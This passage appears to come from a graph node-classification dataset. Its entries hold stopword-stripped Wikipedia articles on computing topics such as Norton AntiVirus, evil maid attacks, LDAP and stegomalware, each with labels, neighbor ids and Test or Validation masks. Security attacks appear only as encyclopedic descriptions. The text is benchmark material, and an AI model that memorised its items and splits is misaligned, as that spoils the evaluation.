2006 support repair feature please uninstall reinstall. symantec claimed faulty update downloaded customers 1:00 pm 7:00 pm july 25 2006 symantec developed workaround tool listed troubleshooting steps available company released statement stating expected deliver repair patch affected users monday july 31 2006 norton antivirus criticized refusing uninstall completely leaving unnecessary files behind another issue versions prior 2009 installed liveupdate updates norton-branded software separately user must uninstall norton antivirus liveupdate component manually liveupdate component purposely left behind update norton-branded products present response symantec developed norton removal tool symnrt remove leftover registry keys values along files folders however neither route uninstallation remove subscription data preserved prevent users installing multiple trial copies symnrt remove norton programs symnrt started removal process stopped recommended close running programs prior running symnrt act winfax users recommended back databases running symnrt norton antivirus 2007 install alongside zonealarm incompatibility caused annoyance norton customers purchased norton antivirus 2007 prior warning notice incompatibility symantec recommends removing zonealarm reinstalling internet worm protection feature disabled controls applications access internet protocols use march 9 2009 users norton antivirus 2006 2007 experienced firewall warning stating norton-associated file pifts.exe trying connect internet although file revealed harmless diagnostic patch program gained attention media symantec removed posts forum concerning pifts information available purpose program speculation program malware backdoor sans internet storm center claimed spoken symantec employee confirmed program part update process intended harm graham cluley consultant antivirus vendor sophos found pifts connected symantec server forwarding product computer information march 10 symantec made official response pifts program claiming posts support forum deleted due forum spam rules however deletion pifts-related posts began spam attacks symantec stated pifts diagnostic patch cole stated purpose update help determine many customers would need migrated windows 7-compatible versions norton antivirus pifts apparently released without digital signature verify identity causing firewalls prompt permission attempted connect internet symantec criticized consumers perceived ethical violations including allegations support technicians would tell customers systems infected needed technician resolve remotely extra fee refuse refund customers alleged systems actually infected norton antivirus 11 mac introduced support mac os x v10.5 leopard platform capability detect macintosh windows malware features include vulnerability scanner blocks attackers leveraging software exploits norton antivirus 11 also includes ability scan within compressed archived files time capsule volumes operating requirements call mac os x tiger powerpc intel core processor 128 mb ram 100 mb free hard disk space also required norton antivirus dual protection mac intended macintosh users windows running systems using boot camp virtualization software vmware fusion provides license norton antivirus 11 norton antivirus 2009 2009 2012 editions symantec made huge changes products speed performance norton products 2 running processes using 24 mb ram soon virus recognized information regards virus virus signature stored pandemic definitions file contains vital know-how become aware get rid virus according tests sponsored symantec passmark security benchmark 2012 norton antivirus norton internet security lightest suites available av-comparatives.org also tested products gave similar results pcmag recognises 2011 2012 lines fastest strongest protection pcworld tests security software put norton internet security 2009 1st place 2011 test pcworld norton internet security winner dennis technology labs tests sponsored symantec confirms performance effectiveness norton 2011 2012 lines 14th august 2013 prime minister new zealand john key addressed identified misinformation surrounding gcsb amendment bill claiming actions government communications security bureau analogous norton antivirus",
    "neighbors": [
      2049,
      10756,
      1052,
      2084,
      550,
      2601,
      6699,
      7739,
      10308,
      4165,
      3163,
      8283,
      2654,
      4710,
      107,
      10872,
      9341,
      127,
      7809,
      131,
      6797,
      10903,
      10392,
      6297,
      7834,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      8368,
      6834,
      10935,
      704,
      7362,
      202,
      7886,
      8398,
      1242,
      224,
      6382,
      9983,
      5891,
      8978,
      7955,
      4374,
      6431,
      5924,
      1318,
      8998,
      2859,
      3885,
      5935,
      7983,
      7473,
      4403,
      9523,
      2870,
      823,
      11065,
      9537,
      4421,
      2378,
      1355,
      10574,
      8024,
      2907,
      7515,
      9055,
      9569,
      3941,
      11622,
      877,
      4464,
      3955,
      4467,
      8572,
      5512,
      1417,
      3981,
      10637,
      3473,
      8614,
      8615,
      1451,
      10166,
      7098,
      7103,
      3520,
      5069,
      10708,
      2005,
      11225,
      8668,
      9713,
      499,
      8700,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6644,
    "label": 4,
    "text": "Evil_maid_attack:evil maid attack evil maid attack attack unattended device attacker physical access alters undetectable way later access device data name refers scenario maid could subvert device left unattended hotel room – concept also applies situations device intercepted transit taken away temporarily airport law enforcement personnel 2009 blog post security analyst joanna rutkowska coined term evil maid attack due hotel rooms common place devices left unattended post detailed method compromising firmware unattended computer via external usb flash drive – therefore bypassing truecrypt disk encryption d. defreez computer security professional first mentioned possibility evil maid attack android smartphones 2011 talked whispercore android distribution ability provide disk encryption androids 2007 former u.s. commerce secretary carlos gutierrez allegedly targeted evil maid attack business trip china left computer unattended trade talk beijing suspected device compromised although allegations yet confirmed denied incident caused u.s. government wary physical attacks 2009 symantec cto mark bregman advised several u.s. agencies leave devices u.s. travelling china instructed buy new ones leaving dispose returned physical attempts retrieve data would ineffective attack begins victim leaves device unattended attacker proceed tamper system victim password protection authentication computer intruder turn computer immediately access victim information however device password protected full disk encryption firmware device needs compromised usually done external drive compromised firmware often provides victim fake password prompt identical original password input compromised firmware sends password attacker removes reboot order successfully complete attack attacker must return device unattended second time steal now-accessible data another method attack dma attack attacker accesses victim information hardware devices connect directly physical address space attacker simply needs connect hardware device order access information evil maid attack also done replacing victim device identical device original device bootloader password attacker needs acquire device identical bootloader password input screen device lock screen however process becomes difficult attacker must acquire background picture put lock screen mimicking device either case victim inputs password false device device sends password attacker possession original device attacker access victim data legacy bios considered insecure evil maid attacks architecture old updates option roms unsigned configuration unprotected additionally support secure boot vulnerabilities allow attacker boot external drive compromise firmware compromised firmware configured send keystrokes attacker remotely unified extensible firmware interface uefi provides many necessary features mitigating evil maid attacks example offers framework secure boot authenticated variables boot-time tpm initialization security despite available security measures platform manufacturers obligated use thus security issues may arise unused features allow attacker exploit device many full disk encryption systems truecrypt pgp whole disk encryption susceptible evil maid attacks due inability authenticate user attacker still modify disk contents despite device powered encrypted attacker modify encryption system loader codes steal passwords victim unattended device vulnerable network evil maid attack attacker knows victim device well enough replace victim device identical model password-stealing mechanism thus victim inputs password attacker instantly notified able access stolen device information one approach detect someone close handling unattended device proximity alarms motion detector alarms wireless cameras used alert victim attacker nearby device thereby nullifying surprise factor evil maid attack android app created 2017 edward snowden monitoring transmit results user smartphone absence tamper-evident technology various kinds used detect whether device taken apart – including low-cost solution putting glitter screw holes attack suspected victim device checked see malware installed challenging suggested approaches checking hashes selected disk sectors partitions device surveillance times attacker perform evil maid attack left unattended device may also placed inside lockbox attacker physical access however situations device taken away temporarily airport law enforcement personnel practical basic security measures latest up-to-date firmware shutting device leaving unattended prevent attack exploiting vulnerabilities legacy architecture allowing external devices open ports respectively cpu-based disk encryption systems tresor loop-amnesia prevent data vulnerable dma attack ensuring leak system memory tpm-based secure boot shown mitigate evil maid attacks authenticating device user unlocking correct password given user measures unauthorized code executed device measurements done root trust systems microsoft bitlocker intel txt technology anti evil maid program builds upon tpm-based secure boot attempts authenticate device user",
    "neighbors": [
      9569,
      2630,
      3495,
      6602,
      1515,
      8333,
      9791,
      7794,
      8978,
      1143,
      7354,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 6645,
    "label": 4,
    "text": "National_Initiative_for_Cybersecurity_Education:national initiative cybersecurity education national initiative cybersecurity education nice partnership government academia private sector focused supporting country ability address current future cybersecurity education workforce challenges standards best practices nice led national institute standards technology nist u.s. department commerce comprehensive national cybersecurity initiative cnci established president george w. bush january 2008 included twelve initiatives one initiative 8 aimed making federal cybersecurity workforce better prepared handle cybersecurity challenges may 2009 cyberspace policy review directed president barack obama elevated cnci initiative 8 initially focused improving federal cybersecurity workforce ability perform cybersecurity work scope expanded beyond federal workforce include private sector workforce truly making national charge march 2010 obama administration declassified limited material regarding cnci making initiative 8 public initiative 8 expand cyber education billions dollars spent new technologies secure u.s. government cyberspace people right knowledge skills abilities implement technologies determine success however enough cybersecurity experts within federal government private sector implement cnci adequately established federal cybersecurity career field existing cybersecurity training personnel development programs good limited focus lack unity effort order effectively ensure continued technical advantage future cybersecurity must develop technologically-skilled cyber-savvy workforce effective pipeline future employees take national strategy similar effort upgrade science mathematics education 1950 ’ meet challenge additionally cnci described training education professional development programs lacking “ unity effort ” cybersecurity enhancement act 2014 title iv established “ national cybersecurity awareness education program ” known national initiative cybersecurity education nice digital economy enabled knowledgeable skilled cybersecurity workforce energize promote robust network ecosystem cybersecurity education training workforce development nice cybersecurity workforce framework nice cybersecurity workforce framework nice framework nist special publication 800-181 national focused resource categorizes describes cybersecurity work publication serves fundamental reference support workforce capable meeting organization cybersecurity needs establishing taxonomy common lexicon describes cybersecurity work workers irrespective work performed nice framework intended applied public private academic sectors although nice framework published nist special publication august 2017 working drafts document use since 2010 publication intended living document updated periodically based change requests nice program office plethora tools resources exist learning implementing nice framework learn nist.gov/nice/framework nice strategic plan cybersecurity enhancement act 2014 requires strategic plan developed implemented every five years current nice strategic plan includes multitude guiding values three primary goals 1 accelerate learning skills development 2 nurture diverse learning community 3 guide career planning workforce development see current past versions nice strategic plan nist.gov/nice supporting growth sustainment nation cybersecurity workforce building foundation secure american future may 2017 president donald trump issued executive order strengthening cybersecurity federal networks critical infrastructure part order states policy united states “ support growth sustainment workforce skilled cybersecurity related fields foundation achieving objectives cyberspace. ” consequently secretary commerce secretary homeland security directed provide report president findings recommendations regarding support growth sustainment nation cybersecurity workforce public private sectors report supporting growth sustainment nation cybersecurity workforce building foundation secure american future response charge nice framework work role capability indicators indicators performing work roles nice framework work role capability indicators indicators performing work roles draft nist interagency report 8193 co-authored representatives u.s. department homeland security national institute standards technology booz allen hamilton inc document helps determine qualities accomplishments indicate someone suitable perform particular job activity qualities defined report “ capability indicators. ” nice headquartered nist facilities gaithersburg maryland nice program office activities organized three categories government engagement industry engagement academic engagement committees nice several committees nice challenge project nice challenge project led california state university san bernardino designed create flexible set challenge environments supporting infrastructure low barrier use one would able perform tasks outlined nice cybersecurity workforce framework used platform instruction well evaluate endeavor part cybersecurity workforce cyberseek cyberseek interactive heat map pathway tool developed comptia partnership burning glass technologies provides data visualization need supply cybersecurity workers guide employers job seekers policy makers education training providers guidance counselors cyberseek includes cybersecurity jobs heat map shows information supply workers relevant credentials project also shows career pathways cybersecurity map opportunities advancement field regional alliances multistakeholder partnerships stimulate cybersecurity education workforce development ramps ramps program provides funding opportunities build multistakeholder workforce partnerships employers schools institutions higher education community organizations",
    "neighbors": [
      6360,
      11561,
      9088,
      9607
    ],
    "mask": "Test"
  },
  {
    "node_id": 6646,
    "label": 4,
    "text": "KeyRaider:keyraider keyraider computer malware affects jailbroken apple ios devices specifically iphones allows criminals steal users login password information well lock devices demand ransom unlock discovered researchers palo alto networks weiphone august 2015 believed led 225,000 people login password information stolen making according cybersecurity columnist joseph steinberg one damaging pieces malware ever discovered apple universe malware originally found chinese website spread 18 countries including united states keyraider affects iphones jailbroken",
    "neighbors": [
      9732,
      1970,
      1299,
      11577,
      7515,
      4957
    ],
    "mask": "None"
  },
  {
    "node_id": 6647,
    "label": 2,
    "text": "DOCS_(software):docs software docs display operator console support software package ibm mainframes cfs inc. enabling access system console using 3270-compatible terminals computer operators communicated ibm mainframe computers using electro-mechanical typewriter-like console came standard ibm 360 370 computer except upper end models offered video consoles model 20 came standard without console majority smaller less expensive ibm 360s 370s came equipped ruggedized selectric keyboard devices selectric major step teletypes tty associated unix smaller systems still clunky video consoles provided certain models considered particularly user friendly ignored two thirds ibm mainframe market dos vse descendants docs replaced supplanted typewriter interface video screen practice worked little like present-day instant messenger programs icq qq aim adium ichat etc data entry line bottom messages scrolling real time screen commands otherwise identical docs available dos dos/vs dos/vse came packaged third party operating systems edos computer software company later acquired nixdorf product ran several dos-related platforms several vendors offered docs part os docs developed cfs inc. brookline massachusetts kayser-roth data center whitman massachusetts dick goran wrote video interface leigh lundin wrote operating system interface transcript recorder docs required dedicated partition dos three partitions dos/vs seven giving partition docs placed crimp practicability leigh lundin designed fx pseudo-partition relieved user relinquishing working partition fx appeared dos/vs version sdi grasp f0 docs sold north america cfs inc brookline overseas sales cfs engaged mail order local vendors product also embedded third party operating system packages edos vdos",
    "neighbors": [
      868,
      8900,
      7272,
      8393,
      4586,
      10094,
      8687,
      7928,
      9137,
      10958,
      5492,
      3669,
      2616,
      11131
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6648,
    "label": 4,
    "text": "UK_cyber_security_community:uk cyber security community cyber security information assurance community united kingdom diverse many stakeholders groups contributing support uk cyber security strategy following list stakeholders according parliamentary committee uk government enough protect nation cyber attack cyber aware cross-government awareness behaviour campaign provides advice simple measures individuals take protect cyber crime department digital culture media sport one lead government departments cyber security policy responsible supporting promoting uk cyber security sector promoting cyber security research innovation working national cyber security centre help ensure uk organisations secure online resilient cyber threats get safe online united kingdom-based campaign national initiative teach citizens basic computer security internet privacy national crime agency nca hosts law enforcement cyber crime unit incorporating child exploitation online protection centre national cyber security centre uk ’ authority cyber security parent organisation gchq absorbed replaced cesg information security arm gchq well centre cyber assessment cca computer emergency response team uk cert uk cyber-related responsibilities centre protection national infrastructure cpni ncsc provides advice support public private sector avoid cyber threats cesg originally communications-electronics security group branch gchq worked secure communications information systems government critical parts uk national infrastructure centre protection national infrastructure cpni provided protective security advice businesses organisations across national infrastructure national security council cabinet committee tasked overseeing issues related national security intelligence coordination defence strategy office cyber security information assurance ocsia supports minister cabinet office rt hon francis maude mp national security council determining priorities relation securing cyberspace unit provides strategic direction coordinates action relating enhancing cyber security information assurance uk ocsia headed james quinault trustworthy software initiative tsi uk public good activity sponsored uk government centre protection national infrastructure aimed 'making software better warning advice reporting points warps provide trusted environment members community share problems solutions uk cyber security forum social enterprise representing cyber sme small medium enterprise uk forum composed 20 regional cyber clusters around uk cluster run subsidiary uk cyber security forum operated groups volunteers provide events around uk engage public cyber security provide continued professional development cyber professionals official clusters ads trade organisation companies operating uk aerospace defence security space industries business continuity institute bci established 1994 enable individual members obtain guidance support fellow business continuity practitioners profit accreditation certification organisation cdf promotes global interests uk crypto development industry information assurance advisory council iaac works across industry government academia towards ensuring uk ’ information society robust resilient secure foundation iaac set baroness neville-jones chaired organisation 2007 handing current chairman sir edmund burton affiliates include bt group northrop grumman qinetiq raytheon pwc o2 uk ultra electronics glaxosmithkline 2012/13 work programme focused consumerisation effects information assurance iacg formed following uk national ia conference 2006 iacg encourages greater collaboration commercial supply base information assurance products services operating within uk public sector stakeholders include cesg bis office cyber security information assurance ocsia cyber security operations centre csoc cpni group maintains uk information assurance community map hosted cesg web site two co-chairs colin robbins nexor ross parsell thales iacg ceased operation 2014 information systems security association issa not-for-profit international professional organization information security professionals practitioners uk chapter institute information security professionals iisp independent non-profit body governed members principal objective advancing professionalism information security practitioners thereby professionalism industry whole isaca international professional association deals governance previously known information systems audit control association isc ² international information systems security certification consortium non-profit organization specializes information security education certifications ndi former government-funded organisation building supply chains mod manufacturers using smes united kingdom techuk formerly known intellect uk trade association technology industry cyber security group focused “ high threat ” areas – including defence national security resilience protection critical national infrastructure intelligence organised crime chaired dr andrew rogoyski roke manor research security resilience group works build strong relationships technology industry policymakers customers end users chaired stephen kingan nexor tigerscheme commercial certification scheme technical security specialists backed university standards covering wide range expertise tigerscheme cesg certified uk candidates subject independent rigorous academic assessment authority tigerscheme founded 2007 principle commercial certification scheme run independent lines would give buyers security testing services confidence hiring recognised reputable company june 2014 operational authority tigerscheme transferred usw commercial services ltd. ukceb not-for-profit membership organisation whose mission transform secure information sharing life collaboration defence acquisition support british computer society bcs professional body learned society represents working information technology united kingdom internationally security data privacy group cyber scheme profit professional examination body contract national cyber security centre provide technical exams support governments assured penetration testing company scheme check exams independent rigorous conducted practitioner team member level team leader levels gchq accredited several academic centres excellence cyber security research accreditations expire july 2017 results re-accreditation process expected mid february 2017 information security research group isrg university south wales multidisciplinary team academics industrial experts focusing upon cyber security particular group focusing upon cyber security centre csc de montfort university multidisciplinary group academics focus wide variety cyber security digital forensics issues centre mission provide full benefits safe secure resilient cyberspace",
    "neighbors": [
      10116,
      8613,
      6054,
      9319,
      4904,
      10823,
      5226,
      7979,
      7692,
      4435,
      691,
      4595,
      6110,
      10717,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6649,
    "label": 5,
    "text": "Link_Control_Protocol:link control protocol computer networking link control protocol lcp forms part point-to-point protocol ppp within family internet protocols setting ppp communications sending receiving devices send lcp packets determine standards ensuing data transmission lcp protocol devices use ppp transmit data network lcp packet determines acceptability link lcp packets embedded ppp packets therefore basic ppp connection established lcp reconfigure lcp ppp packets control code 0xc021 info field contains lcp packet four fields code id length data",
    "neighbors": [
      2080,
      8432,
      5991
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6650,
    "label": 5,
    "text": "Registered_port:registered port registered port network port sub-address defined within internet protocol range 1024–49151 assigned internet assigned numbers authority iana internet corporation assigned names numbers icann march 21 2001 usc/isi 1998 use certain protocol application ports numbers 0–1023 called system well-known ports ports numbers 1024-49151 called user registered ports ports numbers 49152-65535 called dynamic and/or private ports system user ports used transport protocols tcp udp dccp sctp indicate application service",
    "neighbors": [
      5472,
      6273,
      6993,
      5652,
      11413,
      11126
    ],
    "mask": "Test"
  },
  {
    "node_id": 6651,
    "label": 5,
    "text": "Lightweight_Directory_Access_Protocol:lightweight directory access protocol lightweight directory access protocol ldap open vendor-neutral industry standard application protocol accessing maintaining distributed directory information services internet protocol ip network directory services play important role developing intranet internet applications allowing sharing information users systems networks services applications throughout network examples directory services may provide organized set records often hierarchical structure corporate email directory similarly telephone directory list subscribers address phone number ldap specified series internet engineering task force ietf standard track publications called request comments rfcs using description language asn.1 latest specification version 3 published rfc 4511 road map technical specifications provided rfc4510 common use ldap provide central place store usernames passwords allows many different applications services connect ldap server validate users ldap based simpler subset standards contained within x.500 standard relationship ldap sometimes called x.500-lite telecommunication companies understanding directory requirements well developed 70 years producing managing telephone directories companies introduced concept directory services information technology computer networking input culminating comprehensive x.500 specification suite protocols produced international telecommunication union itu 1980s x.500 directory services traditionally accessed via x.500 directory access protocol dap required open systems interconnection osi protocol stack ldap originally intended lightweight alternative protocol accessing x.500 directory services simpler widespread tcp/ip protocol stack model directory access borrowed dixie directory assistance service protocols protocol originally created tim howes university michigan steve kille isode limited colin robbins nexor wengyik yeong performance systems international circa 1993 successor dixie das mark wahl critical angle inc. tim howes steve kille started work 1996 new version ldap ldapv3 aegis internet engineering task force ietf ldapv3 first published 1997 superseded ldapv2 added support extensibility integrated simple authentication security layer better aligned protocol 1993 edition x.500 development ldapv3 specifications numerous extensions adding features ldapv3 come ietf early engineering stages ldap known lightweight directory browsing protocol ldbp renamed expansion scope protocol beyond directory browsing searching include directory update functions given lightweight name network intensive dap predecessor thus easily implemented internet due relatively modest bandwidth usage ldap influenced subsequent internet protocols including later versions x.500 xml enabled directory xed directory service markup language dsml service provisioning markup language spml service location protocol slp also used basis microsoft active directory client starts ldap session connecting ldap server called directory system agent dsa default tcp udp port 389 port 636 ldaps ldap ssl see client sends operation request server server sends responses return exceptions client need wait response sending next request server may send responses order information transmitted using basic encoding rules ber client may request following operations addition server may send unsolicited notifications responses request e.g connection timed common alternative method securing ldap communication using ssl tunnel default port ldap ssl 636 use ldap ssl common ldap version 2 ldapv2 never standardized formal specification usage deprecated along ldapv2 officially retired 2003 global catalog available default ports 3268 3269 ldaps protocol provides interface directories follow 1993 edition x.500 model dn may change lifetime entry instance entries moved within tree reliably unambiguously identify entries uuid might provided set entry operational attributes entry look like represented ldap data interchange format ldif ldap binary protocol codice_3 distinguished name entry neither attribute part entry codice_4 entry rdn relative distinguished name codice_5 dn parent entry codice_6 denotes 'domain component lines show attributes entry attribute names typically mnemonic strings like codice_7 common name codice_6 domain component codice_9 e-mail address codice_10 surname server holds subtree starting specific entry e.g codice_5 children servers may also hold references servers attempt access codice_12 could return referral continuation reference server holds part directory tree client contact server servers also support chaining means server contacts server returns results client ldap rarely defines ordering server may return values attribute attributes entry entries found search operation order follows formal definitions entry defined set attributes attribute set values sets need ordered add operation inserts new entry directory-server database distinguished name add request already exists directory server add duplicate entry set result code add result decimal 68 entryalreadyexists example codice_13 must exist codice_14 must exist ldap session created ldap client connects server authentication state session set anonymous bind operation establishes authentication state session simple bind sasl plain send user dn password plaintext connections utilizing either simple sasl plain encrypted using transport layer security tls server typically checks password codice_15 attribute named entry anonymous bind empty dn password resets connection anonymous state sasl simple authentication security layer bind provides authentication services wide range mechanisms e.g kerberos client certificate sent tls bind also sets ldap protocol version sending version number form integer client requests version server support server must set result code bind response code protocol error normally clients use ldapv3 default protocol always ldap libraries bind first operation session ldapv2 required ldapv3 ldapv3 successful bind request changes authentication state session unsuccessful bind request resets authentication state session delete entry ldap client transmits properly formed delete request server search operation used search read entries parameters server returns matching entries potentially continuation references may returned order final result include result code compare operation takes dn attribute name attribute value checks named entry contains attribute value modify operation used ldap clients request ldap server make changes existing entries attempts modify entries exist fail modify requests subject access controls implemented server modify operation requires distinguished name dn entry specified sequence changes change sequence must one ldif example adding value attribute replace value existing attribute use replace keyword attribute multi-valued client must specify value attribute update delete attribute entry use keyword delete changetype designator modify attribute multi-valued client must specify value attribute delete also modify-increment extension allows incrementable attribute value incremented specified amount following example using ldif increments employeenumber 5 ldap servers replicated topology ldap clients consider using post-read control verify updates instead search update post-read control designed applications need issue search request update – bad form retrieve entry sole purpose checking update worked replication eventual consistency model ldap client assume connects directory server request architects may placed load-balancers ldap proxies ldap clients servers modify dn move/rename entry takes new rdn relative distinguished name optionally new parent dn flag indicates whether delete value entry match old rdn server may support renaming entire directory subtrees update operation atomic operations see either new entry old one hand ldap define transactions multiple operations read entry modify another client may updated entry meantime servers may implement extensions support though extended operation generic ldap operation define new operations part original protocol specification starttls one significant extensions examples include cancel password modify starttls operation establishes transport layer security descendant ssl connection provide data confidentiality protect data observed third parties and/or data integrity protection protects data tampering tls negotiation server sends x.509 certificate prove identity client may also send certificate prove identity client may use sasl/external using sasl/external client requests server derive identity credentials provided lower level tls though technically server may use identity information established lower level typically server use identity information established tls servers also often support non-standard ldaps secure ldap commonly known ldap ssl protocol separate port default 636 ldaps differs ldap two ways 1 upon connect client server establish tls ldap messages transferred without starttls operation 2 ldaps connection must closed upon tls closure ldaps client libraries encrypt communication check host name name supplied certificate abandon operation requests server abort operation named message id server need honor request neither abandon successfully abandoned operation send response similar cancel extended operation send responses implementations support unbind operation abandons outstanding operations closes connection response name historical origin opposite bind operation clients abort session simply closing connection use unbind unbind allows server gracefully close connection free resources would otherwise keep time discovering client abandoned connection also instructs server cancel operations canceled send responses operations canceled ldap uniform resource identifier uri scheme exists clients support varying degrees servers return referrals continuation references see rfc 4516 components described optional example codice_28 refers user attributes john doe entry codice_29 codice_30 searches entry default server note triple slash omitting host double question mark omitting attributes urls special characters must percent-encoded similar non-standard codice_31 uri scheme ldap ssl confused ldap tls achieved using starttls operation using standard codice_32 scheme contents entries subtree governed directory schema set definitions constraints concerning structure directory information tree dit schema directory server defines set rules govern kinds information server hold number elements including attributes elements responsible storing information directory schema defines rules attributes may used entry kinds values attributes may clients may interact values clients may learn schema elements server supports retrieving appropriate subschema subentry schema defines object classes entry must objectclass attribute containing named classes defined schema schema definition classes entry defines kind object entry may represent e.g person organization domain object class definitions also define list attributes must contain values list attributes may contain values example entry representing person might belong classes top person membership person class would require entry contain sn cn attributes allow entry also contain userpassword telephonenumber attributes since entries may multiple objectclasses values entry complex optional mandatory attribute sets formed union object classes represents objectclasses inherited single entry multiple objectclasses values define available required attributes entry parallel schema objectclass class definition instance object-oriented programming representing ldap objectclass ldap entry respectively directory servers may publish directory schema controlling entry base dn given entry subschemasubentry operational attribute operational attribute describes operation directory rather user information returned search explicitly requested server administrators add additional schema entries addition provided schema elements schema representing individual people within organizations termed white pages schema lot server operation left implementor administrator decide accordingly servers may set support wide variety scenarios example data storage server specified server may use flat files databases gateway server access control standardized though work commonly used models users passwords may stored entries elsewhere server may refuse perform operations wishes impose various limits parts ldap extensible examples one define new operations controls may modify requests responses e.g request sorted search results new search scopes bind methods defined attributes options may modify semantics ldap gained momentum vendors provided access protocol services implementation recasts data mimic ldap/x.500 model closely model followed varies example software access sql databases ldap even though ldap readily lend x.500 servers may support ldap well similarly data previously held types data stores sometimes moved ldap directories example unix user group information stored ldap accessed via pam nss modules ldap often used services authentication and/or authorization actions given already-authenticated user service example active directory kerberos used authentication step ldap used authorization step example data model glue schema used distributed information system based ldap enable users applications services discover services exist grid infrastructure information structure state ldap server may return referrals servers requests fulfill requires naming structure ldap entries one find server holding given distinguished name dn concept defined x.500 directory also used ldap another way locating ldap servers organization dns server record srv organization domain example.org may use top level ldap dn codice_33 dc means domain component ldap server also named ldap.example.org organization top level ldap url becomes codice_34 primarily two common styles naming used x.500 2008 ldapv3 documented itu specifications ietf rfcs original form takes top level object country object codice_35 codice_36 domain component model uses model described example country based naming could codice_37 us codice_38",
    "neighbors": [
      514,
      10242,
      1030,
      3592,
      6161,
      8211,
      6681,
      6682,
      10269,
      10271,
      6689,
      35,
      9251,
      2085,
      7208,
      4140,
      7214,
      8238,
      562,
      1586,
      9269,
      6710,
      11321,
      1594,
      2556,
      3133,
      1086,
      4158,
      5181,
      7231,
      6723,
      7753,
      8265,
      9290,
      8781,
      4687,
      8788,
      5723,
      2143,
      6756,
      10341,
      10344,
      7277,
      3695,
      4723,
      3191,
      2679,
      4729,
      6775,
      5251,
      7812,
      9352,
      649,
      6794,
      9868,
      3218,
      3732,
      6805,
      9365,
      151,
      152,
      11413,
      11418,
      3742,
      9380,
      9381,
      3751,
      168,
      3752,
      172,
      10413,
      6318,
      6319,
      10924,
      11442,
      2228,
      9909,
      4793,
      6330,
      7865,
      9403,
      4797,
      702,
      11456,
      8386,
      7364,
      3784,
      8905,
      1229,
      5843,
      9429,
      3286,
      2775,
      6365,
      10461,
      7391,
      1761,
      3297,
      2797,
      6381,
      751,
      8432,
      8946,
      11509,
      3322,
      6395,
      7935,
      9987,
      3847,
      1288,
      2315,
      8975,
      10005,
      5910,
      5402,
      5405,
      9511,
      1327,
      7983,
      7984,
      10035,
      1334,
      2359,
      6456,
      5433,
      2362,
      8504,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      10060,
      849,
      6993,
      1876,
      2904,
      7003,
      8539,
      5469,
      5470,
      5471,
      5472,
      10589,
      866,
      7010,
      871,
      11112,
      361,
      362,
      5482,
      367,
      891,
      6524,
      3966,
      11647,
      10115,
      6541,
      7570,
      3482,
      5531,
      2972,
      10144,
      929,
      9635,
      10659,
      933,
      6054,
      2983,
      6577,
      2996,
      5048,
      10171,
      3006,
      3519,
      8644,
      5573,
      9670,
      2509,
      9167,
      6098,
      11218,
      4053,
      5077,
      987,
      8669,
      6110,
      8670,
      10723,
      5093,
      6629,
      10727,
      3564,
      5102,
      11246,
      4085,
      5624,
      3580,
      10238,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 6652,
    "label": 2,
    "text": "THE_multiprogramming_system:multiprogramming system multiprogramming system os computer operating system designed team led edsger w. dijkstra described monographs 1965-66 published 1968 dijkstra never named system simply abbreviation technische hogeschool eindhoven name dutch eindhoven university technology netherlands system primarily batch system supported multitasking designed multi-user operating system much like sds 940 set processes system static system apparently introduced first forms software-based paged virtual memory electrologica x8 support hardware-based memory management freeing programmers forced use actual physical locations drum memory using modified algol compiler programming language supported dijkstra system automatically generate calls system routines made sure requested information memory swapping necessary paged virtual memory also used buffering i/o device data significant portion operating system code well nearly algol 60 compiler system semaphores used programming construct first time design multiprogramming system significant use layered structure higher layers depend lower layers constraint higher layers depend lower layers imposed designers order make reasoning system using quasi-formal methods tractable also facilitate building testing system incrementally layers implemented order layer 0 first thorough testing abstractions provided layer turn division kernel layers similar ways multics later ring-segmentation model several subsequent operating systems used layering extent including windows nt macos although usually fewer layers code system written assembly language dutch electrologica x8 computer computer word size 27 bits 32 kilowords core memory 512 kilowords drum memory providing backing store lru cache algorithm paper tape readers paper tape punches plotters printers",
    "neighbors": [
      512,
      2179,
      6403,
      9224,
      8976,
      6675,
      11539,
      1952,
      10016,
      2339,
      2345,
      7983,
      5040,
      8262,
      3529,
      1610,
      9294,
      5457,
      5585,
      6868,
      2012,
      477,
      2399,
      7775,
      4201,
      11242,
      2283,
      11625,
      5363,
      6772
    ],
    "mask": "Test"
  },
  {
    "node_id": 6653,
    "label": 4,
    "text": "Stegomalware:stegomalware stegomalware type malware uses steganography hinder detection steganography practice concealing file message image video within another file message image video network traffic type malware operates building steganographic system hide malicious data within resources extracts executes dynamically considered one sophisticated stealthy ways obfuscation term stegomalware introduced researchers context mobile malware presented inscrypt conference 2014 however fact mobile malware could potentially utilize steganography already presented earlier works use steganography malware first applied botnets communicating probabilistically unobservable channels mobile malware based covert channels proposed year steganography later applied components malware engineering return-oriented programming compile-time obfuscation among others europol-supported cuing initiative monitors use steganography malware",
    "neighbors": [
      8171,
      1103,
      3924,
      7515,
      10141
    ],
    "mask": "Test"
  },
  {
    "node_id": 6654,
    "label": 1,
    "text": "Bento_(database):bento database bento database application mac os x made filemaker inc. bento differs significantly company flagship product filemaker pro relies heavily templates integration applications default bento data sources include apple address book calendar previously called ical applications modify directly filemaker announced july 31 2013 would discontinue bento september 30 2013 bento compatible mac os x 10.5 later due reliance features available previous versions operating system certain actions switching templates use core animation animate transition also includes integration time machine backing requires ical 3.0 later renamed calendar live data editing public preview made available along initial product announcement november 13 2007 first final version released january 8 2008 bento template pre-made library forms necessary catalog items within certain context release bento 2 october 14 2008 bento users could import export share templates june 16 2009 filemaker launched template sharing site users download variety templates well share couple user-created template sharing sites also exist october 14 2008 filemaker released bento 2.0 bug fixes new features including integration apple mail new version offer upgrade pricing cost version 1 many customers expressed disappointment official bento user forums filemaker responded using pricing model companies products apple iwork ilife suites additionally november 25 filemaker provided official statement indicating would discontinue revisions bug fixes version 1 product.given interest revision neither quick easy decision come to. br br bento 1 received extensive beta testing like every software product issues discovered shipment followed bento 1.0.2 address critical issues discovered. br br addressing product issues discovered 1.0.2 2.0 release reworked product significant sometimes architectural ways simply put means way easily migrate fixes 2.0 backwards 1.0 would reengineer 1.0 effectively became 2.0 would strongly delayed 2.0.3 version bento releasing free update bento 2.0.1/2.0.2 week continued development bento product line may 20 2012 price bento 4 49 single license 99 'family pack five licenses filemaker announced july 31 2013 